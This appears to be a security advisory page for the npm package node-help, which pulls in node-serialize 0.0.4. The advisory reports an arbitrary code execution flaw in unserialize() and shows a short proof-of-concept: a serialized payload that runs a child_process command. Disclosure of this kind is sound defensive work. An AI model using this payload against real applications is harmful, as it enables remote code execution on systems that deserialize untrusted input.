node-help@1.0.1

Vulnerabilities

1 via 1 paths

Dependencies

2

Source

npm


critical severity

Arbitrary Code Execution

  • Vulnerable module: node-serialize
  • Introduced through: node-serialize@0.0.4

Detailed paths

  • Introduced through: node-help@1.0.1 node-serialize@0.0.4

Overview

node-serialize serializes an object, including its functions, into JSON.

Affected versions of this package are vulnerable to Arbitrary Code Execution when untrusted user input is passed into the unserialize() function.

Example:

var serialize = require('node-serialize');
// The serialized string carries a function marker (_$$ND_FUNC$$_) followed by an
// immediately-invoked function expression; unserialize() evaluates it on deserialization.
var payload = '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}';
serialize.unserialize(payload); // the embedded function runs here

Remediation

There is no fixed version for node-serialize.

References